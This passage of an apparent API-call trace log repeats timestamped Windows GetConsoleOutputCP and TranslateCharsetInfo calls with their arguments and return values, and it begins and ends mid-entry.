lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.530] GetConsoleOutputCP () returned 0x1b5 [0345.531] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.531] GetConsoleOutputCP () returned 0x1b5 [0345.531] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.532] GetConsoleOutputCP () returned 0x1b5 [0345.532] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.532] GetConsoleOutputCP () returned 0x1b5 [0345.533] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.533] GetConsoleOutputCP () returned 0x1b5 [0345.539] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.539] GetConsoleOutputCP () returned 0x1b5 [0345.539] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.539] GetConsoleOutputCP () returned 0x1b5 [0345.540] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.540] GetConsoleOutputCP () returned 0x1b5 [0345.540] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.541] GetConsoleOutputCP () returned 0x1b5 [0345.541] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.541] GetConsoleOutputCP () returned 0x1b5 [0345.542] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.542] GetConsoleOutputCP () returned 0x1b5 [0345.542] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.542] GetConsoleOutputCP () returned 0x1b5 [0345.543] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.543] GetConsoleOutputCP () returned 0x1b5 [0345.543] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.543] GetConsoleOutputCP () returned 0x1b5 [0345.544] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.544] GetConsoleOutputCP () returned 0x1b5 [0345.544] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.544] GetConsoleOutputCP () returned 0x1b5 [0345.545] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.545] GetConsoleOutputCP () returned 0x1b5 [0345.546] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.546] GetConsoleOutputCP () returned 0x1b5 [0345.546] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.546] GetConsoleOutputCP () returned 0x1b5 [0345.547] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.547] GetConsoleOutputCP () returned 0x1b5 [0345.547] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.547] GetConsoleOutputCP () returned 0x1b5 [0345.548] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.548] GetConsoleOutputCP () returned 0x1b5 [0345.548] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.553] GetConsoleOutputCP () returned 0x1b5 [0345.553] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.553] GetConsoleOutputCP () returned 0x1b5 [0345.554] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.554] GetConsoleOutputCP () returned 0x1b5 [0345.554] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.555] GetConsoleOutputCP () returned 0x1b5 [0345.555] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.555] GetConsoleOutputCP () returned 0x1b5 [0345.556] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.556] GetConsoleOutputCP () returned 0x1b5 [0345.556] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.556] GetConsoleOutputCP () returned 0x1b5 [0345.557] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.557] GetConsoleOutputCP () returned 0x1b5 [0345.557] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.557] GetConsoleOutputCP () returned 0x1b5 [0345.558] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.558] GetConsoleOutputCP () returned 0x1b5 [0345.558] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.558] GetConsoleOutputCP () returned 0x1b5 [0345.559] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.559] GetConsoleOutputCP () returned 0x1b5 [0345.560] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.560] GetConsoleOutputCP () returned 0x1b5 [0345.560] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.560] GetConsoleOutputCP () returned 0x1b5 [0345.561] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.561] GetConsoleOutputCP () returned 0x1b5 [0345.561] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.561] GetConsoleOutputCP () returned 0x1b5 [0345.562] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.562] GetConsoleOutputCP () returned 0x1b5 [0345.562] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.562] GetConsoleOutputCP () returned 0x1b5 [0345.563] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.563] GetConsoleOutputCP () returned 0x1b5 [0345.564] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.564] GetConsoleOutputCP () returned 0x1b5 [0345.571] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.571] GetConsoleOutputCP () returned 0x1b5 [0345.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.572] GetConsoleOutputCP () returned 0x1b5 [0345.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.572] GetConsoleOutputCP () returned 0x1b5 [0345.573] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.573] GetConsoleOutputCP () returned 0x1b5 [0345.574] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.574] GetConsoleOutputCP () returned 0x1b5 [0345.574] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.574] GetConsoleOutputCP () returned 0x1b5 [0345.575] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.575] GetConsoleOutputCP () returned 0x1b5 [0345.575] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.575] GetConsoleOutputCP () returned 0x1b5 [0345.576] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.576] GetConsoleOutputCP () returned 0x1b5 [0345.576] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.576] GetConsoleOutputCP () returned 0x1b5 [0345.577] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.577] GetConsoleOutputCP () returned 0x1b5 [0345.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.578] GetConsoleOutputCP () returned 0x1b5 [0345.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.578] GetConsoleOutputCP () returned 0x1b5 [0345.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.579] GetConsoleOutputCP () returned 0x1b5 [0345.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.579] GetConsoleOutputCP () returned 0x1b5 [0345.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.585] GetConsoleOutputCP () returned 0x1b5 [0345.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.586] GetConsoleOutputCP () returned 0x1b5 [0345.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.587] GetConsoleOutputCP () returned 0x1b5 [0345.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.587] GetConsoleOutputCP () returned 0x1b5 [0345.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.588] GetConsoleOutputCP () returned 0x1b5 [0345.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.588] GetConsoleOutputCP () returned 0x1b5 [0345.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.589] GetConsoleOutputCP () returned 0x1b5 [0345.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.589] GetConsoleOutputCP () returned 0x1b5 [0345.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.590] GetConsoleOutputCP () returned 0x1b5 [0345.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.591] GetConsoleOutputCP () returned 0x1b5 [0345.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.591] GetConsoleOutputCP () returned 0x1b5 [0345.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.592] GetConsoleOutputCP () returned 0x1b5 [0345.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.592] GetConsoleOutputCP () returned 0x1b5 [0345.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.593] GetConsoleOutputCP () returned 0x1b5 [0345.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.593] GetConsoleOutputCP () returned 0x1b5 [0345.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.594] GetConsoleOutputCP () returned 0x1b5 [0345.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.595] GetConsoleOutputCP () returned 0x1b5 [0345.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.595] GetConsoleOutputCP () returned 0x1b5 [0345.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.604] GetConsoleOutputCP () returned 0x1b5 [0345.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.604] GetConsoleOutputCP () returned 0x1b5 [0345.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.605] GetConsoleOutputCP () returned 0x1b5 [0345.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.605] GetConsoleOutputCP () returned 0x1b5 [0345.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.606] GetConsoleOutputCP () returned 0x1b5 [0345.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.607] GetConsoleOutputCP () returned 0x1b5 [0345.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.607] GetConsoleOutputCP () returned 0x1b5 [0345.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.608] GetConsoleOutputCP () returned 0x1b5 [0345.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.608] GetConsoleOutputCP () returned 0x1b5 [0345.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.609] GetConsoleOutputCP () returned 0x1b5 [0345.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.609] GetConsoleOutputCP () returned 0x1b5 [0345.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.610] GetConsoleOutputCP () returned 0x1b5 [0345.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.611] GetConsoleOutputCP () returned 0x1b5 [0345.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.617] GetConsoleOutputCP () returned 0x1b5 [0345.617] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.617] GetConsoleOutputCP () returned 0x1b5 [0345.618] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.618] GetConsoleOutputCP () returned 0x1b5 [0345.618] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.618] GetConsoleOutputCP () returned 0x1b5 [0345.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.619] GetConsoleOutputCP () returned 0x1b5 [0345.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.619] GetConsoleOutputCP () returned 0x1b5 [0345.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.620] GetConsoleOutputCP () returned 0x1b5 [0345.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.621] GetConsoleOutputCP () returned 0x1b5 [0345.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.621] GetConsoleOutputCP () returned 0x1b5 [0345.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.622] GetConsoleOutputCP () returned 0x1b5 [0345.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.622] GetConsoleOutputCP () returned 0x1b5 [0345.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.623] GetConsoleOutputCP () returned 0x1b5 [0345.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.623] GetConsoleOutputCP () returned 0x1b5 [0345.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.624] GetConsoleOutputCP () returned 0x1b5 [0345.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.624] GetConsoleOutputCP () returned 0x1b5 [0345.625] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.625] GetConsoleOutputCP () returned 0x1b5 [0345.625] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.626] GetConsoleOutputCP () returned 0x1b5 [0345.626] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.626] GetConsoleOutputCP () returned 0x1b5 [0345.631] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.631] GetConsoleOutputCP () returned 0x1b5 [0345.632] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.632] GetConsoleOutputCP () returned 0x1b5 [0345.632] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.633] GetConsoleOutputCP () returned 0x1b5 [0345.633] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.633] GetConsoleOutputCP () returned 0x1b5 [0345.634] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.634] GetConsoleOutputCP () returned 0x1b5 [0345.634] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.634] GetConsoleOutputCP () returned 0x1b5 [0345.635] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.635] GetConsoleOutputCP () returned 0x1b5 [0345.635] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.635] GetConsoleOutputCP () returned 0x1b5 [0345.636] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.636] GetConsoleOutputCP () returned 0x1b5 [0345.636] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.636] GetConsoleOutputCP () returned 0x1b5 [0345.637] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.637] GetConsoleOutputCP () returned 0x1b5 [0345.638] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.638] GetConsoleOutputCP () returned 0x1b5 [0345.638] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.638] GetConsoleOutputCP () returned 0x1b5 [0345.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.639] GetConsoleOutputCP () returned 0x1b5 [0345.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.639] GetConsoleOutputCP () returned 0x1b5 [0345.640] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.640] GetConsoleOutputCP () returned 0x1b5 [0345.640] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.640] GetConsoleOutputCP () returned 0x1b5 [0345.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.641] GetConsoleOutputCP () returned 0x1b5 [0345.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.642] GetConsoleOutputCP () returned 0x1b5 [0345.642] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.647] GetConsoleOutputCP () returned 0x1b5 [0345.648] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.648] GetConsoleOutputCP () returned 0x1b5 [0345.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.649] GetConsoleOutputCP () returned 0x1b5 [0345.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.649] GetConsoleOutputCP () returned 0x1b5 [0345.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.650] GetConsoleOutputCP () returned 0x1b5 [0345.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: 